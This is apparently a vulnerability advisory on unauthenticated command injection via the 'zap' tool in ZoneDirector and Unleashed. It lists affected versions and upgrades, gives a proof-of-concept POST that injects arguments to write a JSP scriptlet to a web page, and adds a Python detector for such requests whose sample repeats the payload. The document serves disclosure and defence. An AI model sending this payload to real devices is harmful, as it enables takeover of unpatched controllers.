
Remote code execution vulnerability via zap

Aleph Research Advisory

Identifier

Severity

Critical

Product

  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7

Mitigation

  • 9.10.x: Upgrade to 9.10.2.0.84
  • 9.12.x: Upgrade to 9.12.3.0.136
  • 9.13.x: Upgrade to 10.0.1.0.90
  • 10.0.x: Upgrade to 10.0.1.0.90
  • 10.1.x: Upgrade to 10.1.2.0.275
  • 10.2.x: Upgrade to 10.2.1.0.147
  • 10.3.x: Upgrade to 10.3.1.0.21
  • 200.6 and before: Upgrade to 200.7.10.202.94
  • 200.7: Upgrade to 200.7.10.202.94

Technical Details

Remote code execution vulnerability in zap caused by insufficient input validation.

The zap executable is reachable without authentication. Because its input is not sufficiently validated, unintended arguments can be passed to it and used to write a page that is vulnerable to one of the following command injection vulnerabilities:

Proof Of Concept

SSRF POST request example

POST /tools/_rcmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 310

<ajax-request action='docmd' xcmd='wc' updater='system.1568118269965.3208' comp='zapd'>
        <xcmd cmd='wc' comp='zapd' wcid=1 client='192.168.0.1' tool='zap-up' zap-type='udp' server='{tx_station} -R -L/web/uploaded/index.jsp -T<%Delegate("AjaxCmdStat" -Ssession["cid"]);%>' syspmtu=65500 />
</ajax-request>
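
Detection logic for the request shape shown above, added here as an example (it is not part of the advisory and not vendor code): it parses the <xcmd .../> attributes of a /tools/_rcmdstat.jsp body and flags a zapd 'wc' call whose server field carries anything other than a host name, such as extra option-like tokens, a file path or a JSP scriptlet. The two sample bodies are constructed for this example; the first mirrors the PoC, the second is a plausible benign call.

```python
import re

# Constructed sample bodies for this example (not captured traffic): the first
# mirrors the shape of the advisory's PoC, the second is a plausible benign call.
MALICIOUS_BODY = (
    "<ajax-request action='docmd' xcmd='wc' updater='system.1' comp='zapd'>"
    "<xcmd cmd='wc' comp='zapd' wcid=1 client='192.168.0.1' tool='zap-up' "
    "zap-type='udp' server='{tx_station} -R -L/web/uploaded/index.jsp "
    "-T<%Delegate(\"AjaxCmdStat\" -Ssession[\"cid\"]);%>' syspmtu=65500 />"
    "</ajax-request>"
)
BENIGN_BODY = (
    "<ajax-request action='docmd' xcmd='wc' updater='system.2' comp='zapd'>"
    "<xcmd cmd='wc' comp='zapd' wcid=2 client='192.168.0.1' tool='zap-up' "
    "zap-type='udp' server='192.168.0.10' syspmtu=1500 />"
    "</ajax-request>"
)

# name=value pairs; values may be single-quoted, double-quoted or bare.
ATTR_RE = re.compile(r"([\w-]+)=(?:'([^']*)'|\"([^\"]*)\"|([^\s/>]+))")
HOST_RE = re.compile(r"^[A-Za-z0-9.:\-]+$")  # host name or IPv4/IPv6 literal

def parse_xcmd_attrs(body):
    """Return the attributes of the <xcmd .../> element, or None if absent."""
    m = re.search(r"<xcmd\b", body)
    if not m:
        return None
    attrs = {}
    for key, sq, dq, bare in ATTR_RE.findall(body[m.end():]):
        attrs[key] = sq or dq or bare
    return attrs

def inspect_zap_request(body):
    """Classify one request body. Returns None when it is not a zapd 'wc'
    call, otherwise a dict with the server value and the reasons it was flagged."""
    attrs = parse_xcmd_attrs(body)
    if not attrs or attrs.get("comp") != "zapd" or attrs.get("cmd") != "wc":
        return None
    server = attrs.get("server", "")
    reasons = []
    if not HOST_RE.match(server):
        reasons.append("server_not_a_host")
    if server.startswith("-") or re.search(r"\s-\S", server):
        reasons.append("option_like_token")      # extra arguments handed to zap
    if "<%" in server or "%>" in server:
        reasons.append("jsp_scriptlet")           # server-side code in a host field
    if "/" in server:
        reasons.append("path_in_server_field")    # a file path smuggled into the host
    return {"server": server, "flagged": bool(reasons), "reasons": reasons}
```

The same checks can be run on a WAF or reverse-proxy request log; a hit on "jsp_scriptlet" or "path_in_server_field" from an unauthenticated source is a strong indicator of an attempt against an unpatched build.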

Timeline

Posts

Credit

External References